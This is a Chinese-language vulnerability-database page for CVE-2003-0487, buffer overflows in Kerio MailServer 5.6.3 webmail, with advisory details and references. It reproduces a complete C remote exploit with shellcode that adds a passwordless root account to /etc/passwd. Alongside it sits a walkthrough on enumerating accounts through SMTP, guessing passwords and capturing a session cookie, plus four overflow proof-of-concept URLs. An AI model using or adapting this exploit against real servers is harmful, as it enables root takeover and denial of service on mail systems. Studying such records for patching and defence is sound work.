CVE-2003-0487
CVSS7.5
发布时间 :2003-08-07 00:00:00
修订时间 :2016-10-17 22:34:31
NMCOES    

[原文]Multiple buffer overflows in Kerio MailServer 5.6.3 allow remote authenticated users to cause a denial of service and possibly execute arbitrary code via (1) a long showuser parameter in the do_subscribe module, (2) a long folder parameter in the add_acl module, (3) a long folder parameter in the list module, and (4) a long user parameter in the do_map module.


[CNNVD]Kerio MailServer远程用户名缓冲区溢出漏洞(CNNVD-200308-042)

        
        Kerio MailServer服务程序支持IMAP、POP3、Smtp和SSL协议,并且包括WEBMAIL。
        Kerio MailServer的WEBMAIL在处理用户名时缺少正确的边界缓冲区检查,远程攻击者可以用这个漏洞可能以Kerio MailServer进程权限在系统上执行任意指令。
        多个脚本在处理超长用户名时没有进行缓冲区检查,这些脚本包括:
        do_subscribe、add_acl、list、do_map。
        在用户名字段提交超长字符串,可触发缓冲区溢出,精心构建提交数据可能以Kerio MailServer进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0487
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0487
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-042
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105596982503760&w=2
(UNKNOWN)  BUGTRAQ  20030618 Multiple buffer overflows and XSS in Kerio MailServer
http://nautopia.org/vulnerabilidades/kerio_mailserver.htm
(VENDOR_ADVISORY)  MISC  http://nautopia.org/vulnerabilidades/kerio_mailserver.htm
http://www.securityfocus.com/bid/7967
(VENDOR_ADVISORY)  BID  7967
http://xforce.iss.net/xforce/xfdb/12368
(VENDOR_ADVISORY)  XF  kerio-multiple-modules-bo(12368)

- 漏洞信息

Kerio MailServer远程用户名缓冲区溢出漏洞
高危 边界条件错误
2003-08-07 00:00:00 2006-09-27 00:00:00
远程  
        
        Kerio MailServer服务程序支持IMAP、POP3、Smtp和SSL协议,并且包括WEBMAIL。
        Kerio MailServer的WEBMAIL在处理用户名时缺少正确的边界缓冲区检查,远程攻击者可以用这个漏洞可能以Kerio MailServer进程权限在系统上执行任意指令。
        多个脚本在处理超长用户名时没有进行缓冲区检查,这些脚本包括:
        do_subscribe、add_acl、list、do_map。
        在用户名字段提交超长字符串,可触发缓冲区溢出,精心构建提交数据可能以Kerio MailServer进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Kerio
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.kerio.com/

- 漏洞信息 (46)

Kerio MailServer 5.6.3 Remote Buffer Overflow Exploit (EDBID:46)
linux remote
2003-06-27 Verified
25 B-r00t
N/A [点击下载]
/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3   */
/* ========================================= */
/*	                        By B-r00t                                  */
/*				                       */
/* In response to the Kerio Mailserver vulnerabilities              */
/* discovered by David F.Madrid.			       */
/*	                                                                       */
/* Although this exploit requires valid authentication	       */
/* details, it is possible to use 'RCPT TO' to enumerate         */
/* valid accounts 'A La Sendmail' as shown below: -	       */
/*

$ telnet 192.168.0.10 25
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
220 dhcp-185-45 Kerio MailServer 5.6.3 ESMTP ready
mail from: Br00t@host.net
250 2.1.0 Sender <Br00t@host.net> ok

rcpt to: nosuchuser@host.net
550 5.1.1 Mailbox <nosuchuser@host.net> does not exist
rcpt to:admin@host.net
250 2.1.5 Recipient <admin@host.net> ok (local) << default 
admin account.
rcpt to: fred@host.net
250 2.1.5 Recipient <fred@host.net> ok (local) << user fred 
seems to exist.

rset
250 2.0.0 Reset state
quit
221 2.0.0 SMTP closing connection
Connection closed by foreign host.

*/
/* Using a dictionary attack to obtain a large number      */
/* of accounts in conjunction with users  natural              */
/* stupidity for using easy to guess passwords should	*/
/* yield at least one valid account.		*/
/*					*/
/* Once an account has been cracked, login to the	*/
/* Kerio webmail service and record the 'userid' 	*/
/* cookie value: -				*/
/*
$ lynx 192.168.0.10
   Username: fred___________
   Password: _______________
   OK


192.168.0.10 cookie: userid=7dc1700017e708a5  Allow? (Y/N/Always/neVer)
*/
/* Accept the cookie 'Y' to ensure you are fully	*/
/* logged in to the Kerio webmail service.		*/
/*

[br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5

Payload: 408 / 408 bytes


Wall0p! ... !!!


If successful a UID 0 Account 'keriohacker'
has been appended to /etc/passwd. Use 'ssh'
or 'su' (if local) to get r00t! ....

[br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10
Last login: Thu Jun  5 08:21:30 2003

sh-2.05# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05# tail -1 /etc/passwd
keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
sh-2.05#

*SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes
Alternative: Recode the shellcode to add normal user!
That's All Folks ...
ENJOY!
*/


#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define DEST_PORT 80

int main ( int argc, char *argv[] )
{
int socketfd, bytes;
struct sockaddr_in dest_addr;

char buffer[700];
// char ret[] = "\x07\xf7\x7f\xbe"; // Use this if attached with GDB
char ret[] = "\x07\xf7\xff\xbe"; // RedHat Linux 7.2 + 
kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
char *ptr = buffer;
char req[] = "GET /list?folder=~";
char cr[] = "\x0D\x0A";

char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
// Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
"\xeb\x55\x5e\xb0\xff\x2c\xd0\x88\x06\x88\x46\x04\x88\x46\x34"
"\x88\x46\x39\x88\x46\x3d\x31\xc0\x88\x46\x0b\x88\x46\x41\x66"
"\xb8\x0b\x27\x66\x2d\x01\x27\x66\x89\x46\x40\x8d\x5e\x0c\x89"
"\x5e\x42\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd"
"\x80\x89\xc3\xb0\x04\x8b\x4e\x42\x31\xd2\xb2\xff\x80\xea\xca"
"\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xa6\xff"
"\xff\xff\x58\x65\x74\x63\x58\x70\x61\x73\x73\x77\x64\x58\x6b"
"\x65\x72\x69\x6f\x68\x61\x63\x6b\x65\x72\x3a\x3a\x30\x3a\x30"
"\x3a\x42\x2d\x72\x30\x30\x74\x7e\x52\x30\x78\x7e\x59\x33\x72"
"\x7e\x57\x30\x72\x6c\x64\x21\x2e\x3a\x58\x74\x6d\x70\x3a\x58"
"\x62\x69\x6e\x58\x73\x68\x58\x58\x41\x41\x41\x41"
"\x90\x90\x90\x90\x90\x90";

memset (buffer, '\0', sizeof (buffer));

if (argc < 3) {
        printf("\nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
        printf("\nExample: %s 10.0.0.1 userid=771c740df0270936\n", 
argv[0]);
	exit (1);
        }

printf ("\nPayload: %d / 408 bytes\n\n", strlen(shellcode));

strcpy (buffer, req);
strcat (buffer, shellcode);
strcat (buffer, ret);
strcat (buffer, ret);
strcat (buffer, " HTTP/1.0");
strcat (buffer, cr);
strcat (buffer, "Cookie: ");
strcat (buffer, argv[2]);
strcat (buffer, cr);
strcat (buffer, cr);

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);

if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct 
sockaddr)) == -1){
        perror("connect failed");
        close (socketfd);
        exit (3);
        }


bytes = (send (socketfd, ptr, strlen(buffer), 0));
if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
        }

close (socketfd);
printf ("\nWall0p! ... !!!\n\n");
printf ("\nIf successful a UID 0 Account 'keriohacker'");
printf ("\nhas been appended to /etc/passwd. Use 'ssh'");
printf ("\nor 'su' (if local) to get r00t! ....\n\n");

}

// milw0rm.com [2003-06-27]
		

- 漏洞信息 (22800)

Kerio Mailserver 5.6.3 subscribe Module Overflow (EDBID:22800)
linux dos
2003-06-18 Verified
0 David F.Madrid
N/A [点击下载]
source: http://www.securityfocus.com/bid/7967/info

Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures.

Successful exploitation of this vulnerability could potentially result in the execution of arbitrary code, with the privileges of the Kerio MailServer process. 

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA		

- 漏洞信息 (22801)

Kerio Mailserver 5.6.3 add_acl Module Overflow (EDBID:22801)
linux dos
2003-06-18 Verified
0 David F.Madrid
N/A [点击下载]
source: http://www.securityfocus.com/bid/7967/info
 
Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures.
 
Successful exploitation of this vulnerability could potentially result in the execution of arbitrary code, with the privileges of the Kerio MailServer process. 

http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@
localhost/INBOX&add_name=lucas		

- 漏洞信息 (22802)

Kerio Mailserver 5.6.3 list Module Overflow (EDBID:22802)
linux dos
2003-06-18 Verified
0 David F.Madrid
N/A [点击下载]
source: http://www.securityfocus.com/bid/7967/info
  
Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures.
  
Successful exploitation of this vulnerability could potentially result in the execution of arbitrary code, with the privileges of the Kerio MailServer process.

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX		

- 漏洞信息 (22803)

Kerio Mailserver 5.6.3 do_map Module Overflow (EDBID:22803)
linux dos
2003-06-18 Verified
0 David F.Madrid
N/A [点击下载]
source: http://www.securityfocus.com/bid/7967/info
   
Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures.
   
Successful exploitation of this vulnerability could potentially result in the execution of arbitrary code, with the privileges of the Kerio MailServer process.

http://[Server]/do_map?
action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA		

- 漏洞信息

2159
Kerio MailServer do_subscribe Module Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Kerio MailServer. The integrated web server fails to limit input to the "showuser" variable of the "do_dubscribe" module resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2003-06-18 Unknow
2003-06-18 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Kerio MailServer Remote Username Buffer Overrun Vulnerabilities
Boundary Condition Error 7967
Yes No
2003-06-18 12:00:00 2009-07-11 10:06:00
This vulnerability was reported by "David F.Madrid" <conde0@telefonica.net>.

- 受影响的程序版本

Kerio Mailserver 5.6.3
Kerio Mailserver 5.6.4

- 不受影响的程序版本

Kerio Mailserver 5.6.4

- 漏洞讨论

Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures.

Successful exploitation of this vulnerability could potentially result in the execution of arbitrary code, with the privileges of the Kerio MailServer process.

- 漏洞利用

The following proof of concept examples have been released which will trigger a denial of service:

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA

http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@
localhost/INBOX&amp;add_name=lucas

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX

http://[Server]/do_map?
action=new&amp;oldalias=eso&amp;alias=aaa&amp;folder=public&amp;user=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA

The following exploit was provided by B-r00t br00t@blueyonder.co.uk:

- 解决方案

This issue has been addressed in Kerio MailServer 5.6.4. Users should contact the vendor to obtain upgrades.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站